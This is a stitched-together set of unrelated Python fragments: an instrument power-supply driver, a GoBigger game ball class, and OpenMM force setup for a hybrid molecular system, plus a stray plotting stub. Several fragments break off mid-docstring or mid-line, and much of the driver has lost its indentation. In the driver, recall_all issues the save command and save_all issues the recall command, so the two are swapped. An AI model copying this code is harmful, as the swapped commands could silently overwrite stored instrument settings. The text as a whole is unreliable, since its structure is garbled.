    #plot_coords_in_frame(one, ax, frame, marker='^',color='lightgreen', markersize=20,)
    #two = coords.SkyCoord(-30, 0, unit='deg', frame='icrs')
    #plot_coords_in_frame(two, ax, frame, marker='^',color='darkgreen', markersize=20,)
def show_pitch_roll(visit, subplotspec_pitch=None, subplotspec_roll=None):
""" Plot pitch and roll relative to the sun
We here distinguish between | |
3 turns on immediately
* ``{1: 100, 2: 200, 3: 300}`` :math:`\\rightarrow` channel 1 has a 100-ms delay,
channel 2 has a 200-ms delay and channel 3 has a 300-ms delay
See Also
--------
:meth:`.set_multi_on_delay`
:meth:`.set_multi_on_action`
"""
if options:
if not isinstance(options, dict):
self.raise_exception('The Multi-On options must be a dict, got {}'.format(type(options)))
for channel, value in options.items():
if isinstance(value, bool):
self.set_multi_on_action(channel, 'QUICK' if value else 'NEVER')
else:
self.set_multi_on_action(channel, 'DELAY')
self.set_multi_on_delay(channel, value)
time.sleep(0.1) # otherwise the power supply may not set the delay properly
self._write_and_check('OPALL 1')
def turn_off(self, channel):
"""Turn the output channel off.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
"""
self._write_and_check('OP{} 0'.format(channel))
def turn_off_multi(self, options=None):
"""Turn multiple output channels off (the Multi-Off feature).
Parameters
----------
options : :class:`dict`, optional
Set the Multi-Off option for each output channel before setting Multi-Off.
If not specified then uses the pre-programmed options.
If a particular output channel is not included in `options` then
uses the pre-programmed option for that channel.
The keys are the output channel number and the value can be :data:`False`
(set the channel to ``NEVER``, see the manual for more details), :data:`True`
(set the channel to ``QUICK``, see the manual for more details) or a
delay in milliseconds (as an :class:`int`).
Examples:
* ``{1: False}`` :math:`\\rightarrow` channel 1 does not turn off
* ``{2: 100}`` :math:`\\rightarrow` channel 2 has a 100-ms delay
* ``{1: 100, 3: True}`` :math:`\\rightarrow` channel 1 has a 100-ms delay
and channel 3 turns off immediately
* ``{1: 100, 2: 200, 3: 300}`` :math:`\\rightarrow` channel 1 has a 100-ms delay,
channel 2 has a 200-ms delay and channel 3 has a 300-ms delay
See Also
--------
:meth:`.set_multi_off_delay`
:meth:`.set_multi_off_action`
"""
if options:
if not isinstance(options, dict):
self.raise_exception('The Multi-Off options must be a dict, got {}'.format(type(options)))
for channel, value in options.items():
if isinstance(value, bool):
self.set_multi_off_action(channel, 'QUICK' if value else 'NEVER')
else:
self.set_multi_off_action(channel, 'DELAY')
self.set_multi_off_delay(channel, value)
time.sleep(0.1) # otherwise the power supply may not set the delay properly
self._write_and_check('OPALL 0')
def recall(self, channel, index):
"""Recall the settings of the output channel from the store.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
index : :class:`int`
The store index number, can be 0-49.
See Also
--------
:meth:`.save`
"""
self._write_and_check('RCL{} {}'.format(channel, index))
def recall_all(self, index):
"""Recall the settings for all output channels from the store.
Parameters
----------
index : :class:`int`
The store index number, can be 0-49.
See Also
--------
:meth:`.save_all`
"""
self._write_and_check('*SAV {}'.format(index))
    def reset(self):
        """Send the reset, ``*RST``, command (IEEE 488.2 common command)."""
        # NOTE(review): deliberately uses write() rather than _write_and_check() —
        # presumably because *RST also clears the status registers used by the
        # error check; confirm against the instrument manual.
        self.write('*RST')
    def reset_trip(self):
        """Attempt to clear all trip conditions."""
        # NOTE(review): uses write() rather than _write_and_check() — presumably a
        # tripped instrument may not answer the status query cleanly; confirm.
        self.write('TRIPRST')
def save(self, channel, index):
"""Save the present settings of the output channel to the store.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
index : :class:`int`
The store index number, can be 0-49.
See Also
--------
:meth:`.recall`
"""
self._write_and_check('SAV{} {}'.format(channel, index))
def save_all(self, index):
"""Save the settings of all output channels to the store.
Parameters
----------
index : :class:`int`
The store index number, can be 0-49.
See Also
--------
:meth:`.recall_all`
"""
self._write_and_check('*RCL {}'.format(index))
def set_current_limit(self, channel, value):
"""Set the current limit of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
value : :class:`float`
The current limit, in Amps.
"""
self._write_and_check('I{} {}'.format(channel, value))
def set_current_meter_averaging(self, channel, value):
"""Set the current meter measurement averaging of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
value : :class:`str`
Can be ``ON``, ``OFF``, ``LOW``, ``MED`` or ``HIGH``.
"""
self._write_and_check('DAMPING{} {}'.format(channel, value))
def set_current_step_size(self, channel, size):
"""Set the current limit step size of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
size : :class:`float`
The current limit step size, in Amps.
"""
self._write_and_check('DELTAI{} {}'.format(channel, size))
def set_multi_on_action(self, channel, action):
"""Set the Multi-On action of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
action : :class:`str`
The Multi-On action, one of ``QUICK``, ``NEVER`` or ``DELAY``.
"""
self._write_and_check('ONACTION{} {}'.format(channel, action))
def set_multi_on_delay(self, channel, delay):
"""Set the Multi-On delay, in milliseconds, of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
delay : :class:`int`
The delay, in milliseconds.
"""
self._write_and_check('ONDELAY{} {}'.format(channel, delay))
def set_multi_off_action(self, channel, action):
"""Set the Multi-Off action of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
action : :class:`str`
The Multi-Off action, one of ``QUICK``, ``NEVER`` or ``DELAY``.
"""
self._write_and_check('OFFACTION{} {}'.format(channel, action))
def set_multi_off_delay(self, channel, delay):
"""Set the Multi-Off delay, in milliseconds, of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
delay : :class:`int`
The delay, in milliseconds.
"""
self._write_and_check('OFFDELAY{} {}'.format(channel, delay))
def set_over_current_protection(self, channel, enable, value=None):
"""Set the over-current protection trip point of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
enable : :class:`bool`
Whether to enable (:data:`True`) or disable (:data:`False`)
the over-current protection trip point.
value : :class:`float`, optional
If the trip point is enabled then you must specify a value, in Amps.
"""
if enable:
if value is None:
self.raise_exception('Must specify the trip point value if the trip point is enabled')
command = 'OCP{channel} ON;OCP{channel} {value}'.format(channel=channel, value=value)
else:
command = 'OCP{} OFF'.format(channel)
self._write_and_check(command)
def set_over_voltage_protection(self, channel, enable, value=None):
"""Set the over-voltage protection trip point of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
enable : :class:`bool`
Whether to enable (:data:`True`) or disable (:data:`False`)
the over-voltage protection trip point.
value : :class:`float`, optional
If the trip point is enabled then you must specify a value, in Volts.
"""
if enable:
if value is None:
self.raise_exception('Must specify the trip point value if the trip point is enabled')
command = 'OVP{channel} ON;OVP{channel} {value}'.format(channel=channel, value=value)
else:
command = 'OVP{} OFF'.format(channel)
self._write_and_check(command)
def set_voltage(self, channel, value, verify=True):
"""Set the output voltage of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
value : :class:`float`
The value, in Volts.
verify : :class:`bool`, optional
Whether to verify that the output voltage has stabilized at
`value` before returning to the calling program.
"""
if verify:
command = 'V{}V {}'.format(channel, value)
else:
command = 'V{} {}'.format(channel, value)
self._write_and_check(command)
def set_voltage_range(self, channel, index):
"""Set the output voltage range of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
index : :class:`int`
The output voltage range index. See the manual for more details.
For example, 2 = 35V/3A.
"""
self._write_and_check('VRANGE{} {}'.format(channel, index))
def set_voltage_step_size(self, channel, size):
"""Set the voltage step size of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
size : :class:`float`
The voltage step size, in Volts.
"""
self._write_and_check('DELTAV{} {}'.format(channel, size))
def set_voltage_tracking_mode(self, mode):
"""Set the voltage tracking mode of the unit.
Parameters
----------
mode : :class:`int`
The voltage tracking mode. See the manual for more details.
"""
self._write_and_check('CONFIG {}'.format(mode))
def _check_event_status_register(self, command):
"""Check the value of the standard event status register for an error.
Parameters
----------
command : :class:`str`
The command that was sent prior to checking for an error.
"""
status = self.event_status_register(as_integer=False)
# Bit 7 - Power On. Set when power is first applied to the instrument.
# Bit 1 and 6 - Not used, permanently 0.
# Bit 0 - Operation Complete. Set in response to the *OPC command.
bit5, bit4, bit3, bit2 = status[2:-2]
if bit5 == '1': # Bit 5 - Command | |
# <gh_stars>0  -- dataset-scraper artifact; commented out so the module parses
import math
import logging
import uuid
import copy
from easydict import EasyDict
from pygame.math import Vector2
from gobigger.utils import format_vector, add_size, Border, deep_merge_dicts
from .base_ball import BaseBall
from .food_ball import FoodBall
from .thorns_ball import ThornsBall
from .spore_ball import SporeBall
class CloneBall(BaseBall):
"""
Overview:
One of the balls that a single player can control
- characteristic:
* Can move
* Can eat any other ball smaller than itself
* Under the control of the player, the movement can be stopped immediately and contracted towards the center of mass of the player
* Skill 1: Split each unit into two equally
* Skill 2: Spit spores forward
* There is a percentage of weight attenuation, and the radius will shrink as the weight attenuates
"""
@staticmethod
def default_config():
    """
    Overview:
        Build the default configuration for a CloneBall: the BaseBall defaults
        overlaid with the clone-specific tuning parameters.
    Returns:
        An ``EasyDict`` holding the merged configuration.
    """
    overrides = dict(
        acc_max=50,                   # Maximum acceleration
        vel_max=25,                   # Maximum velocity
        radius_min=2,                 # Minimum radius
        radius_max=100,               # Maximum radius
        radius_init=2,                # The initial radius of the player's ball
        part_num_max=16,              # Maximum number of avatars
        on_thorns_part_num=10,        # Maximum number of splits when encountering thorns
        on_thorns_part_radius_max=5,  # Maximum radius of a split part when encountering thorns
        split_radius_min=30,          # Lower radius limit for a ball that may split
        eject_radius_min=30,          # Lower radius limit for a ball that may eject spores
        recombine_age=30,             # Time for a split ball to be allowed to rejoin (s)
        split_vel_init=50,            # Initial velocity of a split ball
        split_vel_zero_time=0.1,      # Time for the split velocity to decay to zero (s)
        stop_zero_time=0.1,           # Time to zero the speed after using the stop function
        size_decay_rate=0.0001,       # Size proportion lost on each state frame
        given_acc_weight=10,          # Ratio of actual acceleration to input acceleration
    )
    merged = BaseBall.default_config()
    merged.update(overrides)
    return EasyDict(merged)
def __init__(self, team_name, name, position, border, size=None, vel=None, acc=None,
             vel_last=None, acc_last=None, last_given_acc=None, stop_flag=False,
             owner=None, spore_settings=None, **kwargs):
    """
    Overview:
        Create a player-controlled clone ball.
    Parameters:
        team_name: name of the team this ball belongs to
        name: unique name/id of this ball
        position: initial position (a pygame ``Vector2``)
        border: playing-field border, used by ``check_border``
        size / vel / acc: forwarded to ``BaseBall.__init__``
        vel_last / acc_last: residual split velocity / deceleration carried
            over from a split; default to zero vectors
        last_given_acc: last player-input acceleration; defaults to a zero vector
        stop_flag: whether the stop skill is currently active
        owner: id of the owning player
        spore_settings: configuration used when this ball ejects spores;
            defaults to a fresh ``SporeBall.default_config()`` per instance
        **kwargs: overrides merged into ``CloneBall.default_config()``
    """
    # BUGFIX: ``spore_settings`` previously defaulted to
    # ``SporeBall.default_config()`` in the signature.  A default argument is
    # evaluated once at definition time, so every CloneBall created without an
    # explicit value shared (and could mutate) the very same config object.
    # Resolve the default per call instead; passing a value explicitly is
    # unchanged.
    if spore_settings is None:
        spore_settings = SporeBall.default_config()
    # merge user-supplied overrides into the default configuration
    kwargs = EasyDict(kwargs)
    cfg = CloneBall.default_config()
    cfg = deep_merge_dicts(cfg, kwargs)
    super(CloneBall, self).__init__(name, position, border, size=size, vel=vel, acc=acc, **cfg)
    self.vel_max = cfg.vel_max
    self.acc_max = cfg.acc_max
    self.radius_min = cfg.radius_min
    self.radius_max = cfg.radius_max
    self.radius_init = cfg.radius_init
    self.part_num_max = cfg.part_num_max
    self.on_thorns_part_num = cfg.on_thorns_part_num
    self.on_thorns_part_radius_max = cfg.on_thorns_part_radius_max
    self.split_radius_min = cfg.split_radius_min
    self.eject_radius_min = cfg.eject_radius_min
    self.recombine_age = cfg.recombine_age
    self.split_vel_init = cfg.split_vel_init
    self.split_vel_zero_time = cfg.split_vel_zero_time
    self.stop_zero_time = cfg.stop_zero_time
    self.size_decay_rate = cfg.size_decay_rate
    self.given_acc_weight = cfg.given_acc_weight
    self.spore_settings = spore_settings
    self.cfg = cfg
    # per-instance state
    self.team_name = team_name
    self.owner = owner
    # deceleration magnitude applied to the residual split velocity
    self.split_acc_init = self.split_vel_init / self.split_vel_zero_time
    self.age = 0  # time elapsed since this ball was produced by a split
    self.vel_last = Vector2(0, 0) if vel_last is None else vel_last
    self.acc_last = Vector2(0, 0) if acc_last is None else acc_last
    # a non-zero residual split velocity means the ball is still "cooling down"
    if self.vel_last.length() > 0:
        self.cooling_last = True
    else:
        self.cooling_last = False
    if not hasattr(self, 'direction'):
        # tiny epsilon keeps normalize() from failing on an all-zero vector
        self.direction = copy.deepcopy((self.vel + self.vel_last + Vector2(0.00001, 0.00001)).normalize())
    self.check_border()
    self.stop_flag = stop_flag
    self.last_given_acc = Vector2(0, 0) if last_given_acc is None else last_given_acc
def cal_vel_max(self, radius):
    """Maximum speed for a ball of the given radius: larger balls move slower."""
    return (20.0 * self.vel_max) / (radius + 10)
def move(self, given_acc=None, given_acc_center=None, duration=0.05):
    """
    Overview:
        Realize the movement of the ball, pass in the direction and time parameters.
    Parameters:
        given_acc: player-input acceleration for this frame (a vector with
            ``length()``/``normalize()``; presumably a pygame Vector2 -- TODO confirm).
            ``None`` reuses the last given acceleration.
        given_acc_center: acceleration towards the player's center of mass;
            ``None`` means this is a single ball (no centering pull).
        duration: frame time step in seconds (advances ``self.age``).
    """
    self.age += duration
    if given_acc is not None:
        # clamp the input to the unit disc, then scale it by 10
        given_acc = given_acc if given_acc.length() < 1 else given_acc.normalize()
        given_acc *= 10
        self.last_given_acc = given_acc
    else:
        # no fresh input: keep accelerating in the last commanded direction
        given_acc = self.last_given_acc
    if self.stop_flag:  # Stop function used
        if not hasattr(self, 'stop_time'):
            # lazily initialize the stop-skill state on first frame of the stop
            self.stop_time = 0
            self.acc_stop = Vector2(0, 0)
        if self.stop_time < self.stop_zero_time:  # Deceleration state
            self.vel = self.vel + self.acc_stop * duration  # Acceleration is already in the opposite direction of speed
            self.vel_last += self.acc_last * duration
            self.stop_time += duration
            if self.stop_time >= self.stop_zero_time:  # If the stop time is exceeded, set the speed and acceleration to 0 directly
                self.vel = Vector2(0, 0)
                self.acc_stop = Vector2(0, 0)
                self.vel_last = Vector2(0, 0)
                self.acc_last = Vector2(0, 0)
            self.position = self.position + (self.vel + self.vel_last) * duration
        else:  # Exceed the stop time, move closer to the center
            if given_acc_center is None:  # Single ball: nothing to contract towards
                # NOTE(review): this early return also skips the direction
                # update and check_border() below -- confirm intentional.
                return
            else:  # Multiple balls
                self.acc = format_vector(given_acc*self.acc_max, self.acc_max)
                # The acceleration towards the center of mass is handled separately;
                # it is damped by sqrt(radius) so big balls react less.
                acc_tmp = format_vector(self.acc + given_acc_center/math.sqrt(self.radius), self.acc_max)
                self.vel_max_ball = self.cal_vel_max(self.radius)
                self.vel = format_vector(self.vel * 0.95 + (self.acc + acc_tmp) * duration, self.vel_max_ball)  # vel is multiplied by a number to prevent circling phenomenon
                self.position = self.position + self.vel * duration
    else:  # normal status
        self.acc_stop = Vector2(0, 0)
        if given_acc_center is None:
            given_acc_center = Vector2(0, 0)
        self.acc = format_vector(given_acc*self.acc_max, self.acc_max)
        # The acceleration towards the center of mass is handled separately
        acc_tmp = format_vector(self.acc + given_acc_center/math.sqrt(self.radius), self.acc_max)
        self.vel_max_ball = self.cal_vel_max(self.radius)
        self.vel = format_vector(self.vel + (self.acc + acc_tmp) * duration, self.vel_max_ball)
        if self.cooling_last:
            # residual split velocity decays until split_vel_zero_time is reached
            self.vel_last += self.acc_last * duration
            if self.age >= self.split_vel_zero_time:
                self.vel_last = Vector2(0, 0)
                self.acc_last = Vector2(0, 0)
                self.cooling_last = False
        self.position = self.position + (self.vel + self.vel_last) * duration
    if self.vel.length() > 0 or self.vel_last.length() > 0:
        # remember the facing direction for eject()/split() defaults
        self.direction = (self.vel + self.vel_last).normalize()
    self.check_border()
def eat(self, ball, clone_num=None):
    """
    Overview:
        Absorb another ball and grow by its size.
    Parameters:
        ball: the ball being eaten (SporeBall, FoodBall, CloneBall or ThornsBall)
        clone_num <int>: The total number of balls for the current player;
            required (asserted) only when ``ball`` is a ThornsBall
    Returns:
        The list of newly created balls from ``on_thorns`` when eating a
        ThornsBall triggers a split; otherwise ``True``.
    """
    if isinstance(ball, SporeBall) or isinstance(ball, FoodBall) or isinstance(ball, CloneBall):
        self.set_size(add_size(self.size, ball.size))
        if self.radius > self.radius_max:
            # clamp growth at the configured maximum radius
            self.radius = self.radius_max
    elif isinstance(ball, ThornsBall):
        assert clone_num is not None
        self.set_size(add_size(self.size, ball.size))
        # NOTE(review): unlike the branch above, the radius is not clamped to
        # radius_max here -- confirm whether that is intentional.
        if clone_num < self.part_num_max:
            # split into as many parts as the player's ball budget allows
            split_num = min(self.part_num_max - clone_num, self.on_thorns_part_num)
            # NOTE(review): this early return skips the check_border() call below.
            return self.on_thorns(split_num=split_num)
    else:
        logging.debug('CloneBall can not eat {}'.format(type(ball)))
    self.check_border()
    return True
def on_thorns(self, split_num) -> list:
    '''
    Overview:
        Split after hitting a thorns ball.  The current ball shrinks to become
        the middle ball and ``split_num`` new balls are spawned on a circle
        around it, each flying outwards with an initial velocity that decays.
    Parameters:
        split_num <int>: number of new balls to spawn
    Returns:
        The list of newly created surrounding balls.
    '''
    # Size bookkeeping: each surrounding ball gets around_radius^2 of size,
    # the remainder stays with this (middle) ball.
    around_radius = min(math.sqrt(self.size / (split_num + 1)), self.on_thorns_part_radius_max)
    around_size = around_radius * around_radius
    self.set_size(self.size - around_size * split_num)
    balls = []
    for idx in range(split_num):
        theta = 2 * math.pi * (idx + 1) / split_num
        ux = math.cos(theta)
        uy = math.sin(theta)
        # spawn tangent to the (already shrunken) middle ball
        offset = self.radius + around_radius
        around_ball = CloneBall(team_name=self.team_name, name=uuid.uuid1(),
                                position=self.position + Vector2(offset * ux, offset * uy),
                                border=self.border, size=around_size,
                                vel=copy.deepcopy(self.vel), acc=copy.deepcopy(self.acc),
                                vel_last=Vector2(self.split_vel_init * ux, self.split_vel_init * uy),
                                acc_last=-Vector2(self.split_acc_init * ux, self.split_acc_init * uy),
                                last_given_acc=copy.deepcopy(self.last_given_acc),
                                stop_flag=self.stop_flag, owner=self.owner,
                                spore_settings=self.spore_settings, **self.cfg)
        balls.append(around_ball)
    return balls
def eject(self, direction=None) -> list:
    '''
    Overview:
        Spit a spore in the ball's moving direction; the spore is placed
        tangent to the (shrunken) ball.
    Returns:
        The newly created SporeBall, or ``False`` if this ball is too small
        to eject.  (Note: a single ball is returned, not a list.)
    '''
    if direction is None:
        direction = copy.deepcopy(self.direction)
    # guard: only balls above the eject threshold may spit spores
    if self.radius < self.eject_radius_min:
        return False
    spore_radius = self.spore_settings.radius_min
    # pay the spore's size out of this ball before placing it
    self.set_size(self.size - spore_radius ** 2)
    unit = direction.normalize()
    spawn_position = self.position + unit * (self.radius + spore_radius)
    return SporeBall(name=uuid.uuid1(), position=spawn_position, border=self.border,
                     direction=unit, **self.spore_settings)
def split(self, clone_num, direction=None) -> list:
    '''
    Overview:
        Active split: halve this ball and spawn the other half tangent to it
        in the forward direction, flying outwards with a decaying velocity.
    Parameters:
        clone_num <int>: The total number of balls for the current player
    Returns:
        The newly created CloneBall, or ``False`` if this ball is too small
        or the player is already at the ball limit.
    '''
    if direction is None:
        direction = copy.deepcopy(self.direction)
    # guard: need both enough radius and a free slot in the player's ball budget
    if self.radius < self.split_radius_min or clone_num >= self.part_num_max:
        return False
    half_size = self.size / 2
    self.set_size(half_size)
    unit = direction.normalize()
    # placed tangent: two radii ahead of the (already shrunken) ball's center
    return CloneBall(team_name=self.team_name, name=uuid.uuid1(),
                     position=self.position + unit * (self.radius * 2),
                     border=self.border, size=half_size,
                     vel=copy.deepcopy(self.vel), acc=copy.deepcopy(self.acc),
                     vel_last=self.split_vel_init * unit,
                     acc_last=-self.split_acc_init * unit,
                     last_given_acc=copy.deepcopy(self.last_given_acc),
                     stop_flag=self.stop_flag, owner=self.owner,
                     spore_settings=self.spore_settings, **self.cfg)
def rigid_collision(self, ball):
'''
Overview:
When two balls collide, We need to determine whether the two balls belong to the same player
A. If not, do nothing until one party is eaten at the end
B. If the two balls are the same owner, judge whether the age of the two is full or not meet the fusion condition, if they are satisfied, do nothing.
C. If the two balls are the same owner, judge | |
interaction contains unique old atoms
if len(atom_interaction_set.intersection(self._atom_classes['unique_old_atoms'])) > 0:
return InteractionGroup.unique_old
#Do the same for new atoms
elif len(atom_interaction_set.intersection(self._atom_classes['unique_new_atoms'])) > 0:
return InteractionGroup.unique_new
#if the interaction set is a strict subset of the environment atoms, then it is in the environment group
#and should not be alchemically modified at all.
elif atom_interaction_set.issubset(self._atom_classes['environment_atoms']):
return InteractionGroup.environment
#having covered the cases of all-environment, unique old-containing, and unique-new-containing, anything else
#should belong to the last class--contains core atoms but not any unique atoms.
else:
return InteractionGroup.core
def _add_bond_force_terms(self):
    """
    Register the bond forces on the hybrid system: an alchemically
    interpolated CustomBondForce for core bonds and a plain
    HarmonicBondForce for environment/unique bonds.  No particles are added
    here -- only the (empty) forces are created and recorded in
    ``self._hybrid_system_forces``.
    """
    pieces = [
        '(K/2)*(r-length)^2;',
        'K = (1-lambda_bonds)*K1 + lambda_bonds*K2;',          # interpolate spring constant
        'length = (1-lambda_bonds)*length1 + lambda_bonds*length2;',  # interpolate bond length
    ]
    if self._has_functions:
        try:
            pieces.append('lambda_bonds = ' + self._functions['lambda_bonds'])
        except KeyError as e:
            print("Functions were provided, but no term was provided for the bonds")
            raise e
    core_force = openmm.CustomBondForce(''.join(pieces))
    # per-bond parameter order defines the parameter indices -- keep it stable
    for per_bond_param in ('length1', 'K1', 'length2', 'K2'):
        core_force.addPerBondParameter(per_bond_param)
    if self._has_functions:
        core_force.addGlobalParameter('lambda', 0.0)
        core_force.addEnergyParameterDerivative('lambda')
    else:
        core_force.addGlobalParameter('lambda_bonds', 0.0)
    self._hybrid_system.addForce(core_force)
    self._hybrid_system_forces['core_bond_force'] = core_force
    # bonds involving only environment/unique atoms are never scaled
    plain_force = openmm.HarmonicBondForce()
    self._hybrid_system.addForce(plain_force)
    self._hybrid_system_forces['standard_bond_force'] = plain_force
def _add_angle_force_terms(self):
    """
    Add the appropriate angle force terms to the hybrid system:
    an interpolated CustomAngleForce for core angles, optional
    CustomAngleForces for angle terms neglected by the geometry engine,
    and a plain HarmonicAngleForce for environment/unique angles.
    Particles/parameters are added elsewhere; only the forces are set up here.
    """
    energy_expression = '(K/2)*(theta-theta0)^2;'
    energy_expression += 'K = (1.0-lambda_angles)*K_1 + lambda_angles*K_2;'  # linearly interpolate spring constant
    energy_expression += 'theta0 = (1.0-lambda_angles)*theta0_1 + lambda_angles*theta0_2;'  # linearly interpolate equilibrium angle
    if self._has_functions:
        try:
            energy_expression += 'lambda_angles = ' + self._functions['lambda_angles']
        except KeyError as e:
            print("Functions were provided, but no term was provided for the angles")
            raise e

    def _add_per_angle_params(force):
        # per-angle parameter order defines the parameter indices -- keep it stable
        force.addPerAngleParameter('theta0_1')  # molecule1 equilibrium angle
        force.addPerAngleParameter('K_1')       # molecule1 spring constant
        force.addPerAngleParameter('theta0_2')  # molecule2 equilibrium angle
        force.addPerAngleParameter('K_2')       # molecule2 spring constant

    # create the core force and add the relevant parameters
    custom_core_force = openmm.CustomAngleForce(energy_expression)
    _add_per_angle_params(custom_core_force)
    # forces for neglected angle terms; the K_1/K_2 term will be zeroed as appropriate
    if len(self.neglected_new_angle_terms) > 0:  # at least one neglected angle term from the geometry engine
        _logger.info("\t_add_angle_force_terms: there are > 0 neglected new angles: adding CustomAngleForce")
        custom_neglected_new_force = openmm.CustomAngleForce(energy_expression)
        _add_per_angle_params(custom_neglected_new_force)
    if len(self.neglected_old_angle_terms) > 0:  # at least one neglected angle term from the geometry engine
        _logger.info("\t_add_angle_force_terms: there are > 0 neglected old angles: adding CustomAngleForce")
        custom_neglected_old_force = openmm.CustomAngleForce(energy_expression)
        _add_per_angle_params(custom_neglected_old_force)
    if self._has_functions:
        custom_core_force.addGlobalParameter('lambda', 0.0)
        custom_core_force.addEnergyParameterDerivative('lambda')
        if len(self.neglected_new_angle_terms) > 0:
            custom_neglected_new_force.addGlobalParameter('lambda', 0.0)
            custom_neglected_new_force.addEnergyParameterDerivative('lambda')
        if len(self.neglected_old_angle_terms) > 0:
            custom_neglected_old_force.addGlobalParameter('lambda', 0.0)
            custom_neglected_old_force.addEnergyParameterDerivative('lambda')
    else:
        custom_core_force.addGlobalParameter('lambda_angles', 0.0)
        if len(self.neglected_new_angle_terms) > 0:
            custom_neglected_new_force.addGlobalParameter('lambda_angles', 0.0)
        # BUGFIX: this condition previously re-checked neglected_NEW_angle_terms,
        # which raised NameError (custom_neglected_old_force undefined) when only
        # new terms existed, and silently skipped the old force's global
        # parameter when only old terms existed.
        if len(self.neglected_old_angle_terms) > 0:
            custom_neglected_old_force.addGlobalParameter('lambda_angles', 0.0)
    # add the forces to the system and the force dict.
    self._hybrid_system.addForce(custom_core_force)
    self._hybrid_system_forces['core_angle_force'] = custom_core_force
    if len(self.neglected_new_angle_terms) > 0:
        self._hybrid_system.addForce(custom_neglected_new_force)
        self._hybrid_system_forces['custom_neglected_new_angle_force'] = custom_neglected_new_force
    if len(self.neglected_old_angle_terms) > 0:
        self._hybrid_system.addForce(custom_neglected_old_force)
        self._hybrid_system_forces['custom_neglected_old_angle_force'] = custom_neglected_old_force
    # add an angle term for environment/unique interactions--these are never scaled
    standard_angle_force = openmm.HarmonicAngleForce()
    self._hybrid_system.addForce(standard_angle_force)
    self._hybrid_system_forces['standard_angle_force'] = standard_angle_force
def _add_torsion_force_terms(self):
    """
    Register the torsion forces on the hybrid system.  Core torsions are
    interpolated by a CustomTorsionForce, while environment and unique
    torsions live in a plain PeriodicTorsionForce that is always fully on.
    """
    expression = ('(1-lambda_torsions)*U1 + lambda_torsions*U2;'
                  'U1 = K1*(1+cos(periodicity1*theta-phase1));'
                  'U2 = K2*(1+cos(periodicity2*theta-phase2));')
    if self._has_functions:
        try:
            expression += 'lambda_torsions = ' + self._functions['lambda_torsions']
        except KeyError as e:
            print("Functions were provided, but no term was provided for torsions")
            raise e
    core_force = openmm.CustomTorsionForce(expression)
    # per-torsion parameter order defines the parameter indices -- keep it stable
    for per_torsion_param in ('periodicity1', 'phase1', 'K1',
                              'periodicity2', 'phase2', 'K2'):
        core_force.addPerTorsionParameter(per_torsion_param)
    if self._has_functions:
        core_force.addGlobalParameter('lambda', 0.0)
        core_force.addEnergyParameterDerivative('lambda')
    else:
        core_force.addGlobalParameter('lambda_torsions', 0.0)
    self._hybrid_system.addForce(core_force)
    self._hybrid_system_forces['core_torsion_force'] = core_force
    # torsions involving only environment/unique atoms are never scaled
    plain_force = openmm.PeriodicTorsionForce()
    self._hybrid_system.addForce(plain_force)
    self._hybrid_system_forces['standard_torsion_force'] = plain_force
def _add_nonbonded_force_terms(self):
    """
    Add the nonbonded force terms to the hybrid system. Note that as with the other forces,
    this method does not add any interactions. It only sets up the forces.

    Reads ``self._nonbonded_method`` (an ``openmm.NonbondedForce`` method
    constant) and mirrors cutoff/reaction-field/PME settings from the old
    system's NonbondedForce.  Registers two forces in
    ``self._hybrid_system_forces``: 'standard_nonbonded_force' (plain
    NonbondedForce for unmodified interactions) and 'core_sterics_force'
    (CustomNonbondedForce with the softcore sterics expression).
    """
    #Add a regular nonbonded force for all interactions that are not changing.
    standard_nonbonded_force = openmm.NonbondedForce()
    self._hybrid_system.addForce(standard_nonbonded_force)
    _logger.info(f"\t_add_nonbonded_force_terms: {standard_nonbonded_force} added to hybrid system")
    self._hybrid_system_forces['standard_nonbonded_force'] = standard_nonbonded_force
    # Create a CustomNonbondedForce to handle alchemically interpolated nonbonded parameters.
    # Select functional form based on nonbonded method.
    # TODO: check _nonbonded_custom_ewald and _nonbonded_custom_cutoff since they take arguments that are never used...
    if self._nonbonded_method in [openmm.NonbondedForce.NoCutoff]:
        _logger.info("\t_add_nonbonded_force_terms: nonbonded_method is NoCutoff")
        sterics_energy_expression = self._nonbonded_custom(self._softcore_LJ_v2)
    elif self._nonbonded_method in [openmm.NonbondedForce.CutoffPeriodic, openmm.NonbondedForce.CutoffNonPeriodic]:
        _logger.info("\t_add_nonbonded_force_terms: nonbonded_method is Cutoff(Periodic or NonPeriodic)")
        # mirror the reaction-field settings of the old system's NonbondedForce
        epsilon_solvent = self._old_system_forces['NonbondedForce'].getReactionFieldDielectric()
        r_cutoff = self._old_system_forces['NonbondedForce'].getCutoffDistance()
        sterics_energy_expression = self._nonbonded_custom(self._softcore_LJ_v2)
        standard_nonbonded_force.setReactionFieldDielectric(epsilon_solvent)
        standard_nonbonded_force.setCutoffDistance(r_cutoff)
    elif self._nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald]:
        _logger.info("\t_add_nonbonded_force_terms: nonbonded_method is PME or Ewald")
        # copy PME parameters, error tolerance and cutoff from the old system
        [alpha_ewald, nx, ny, nz] = self._old_system_forces['NonbondedForce'].getPMEParameters()
        delta = self._old_system_forces['NonbondedForce'].getEwaldErrorTolerance()
        r_cutoff = self._old_system_forces['NonbondedForce'].getCutoffDistance()
        sterics_energy_expression = self._nonbonded_custom(self._softcore_LJ_v2)
        standard_nonbonded_force.setPMEParameters(alpha_ewald, nx, ny, nz)
        standard_nonbonded_force.setEwaldErrorTolerance(delta)
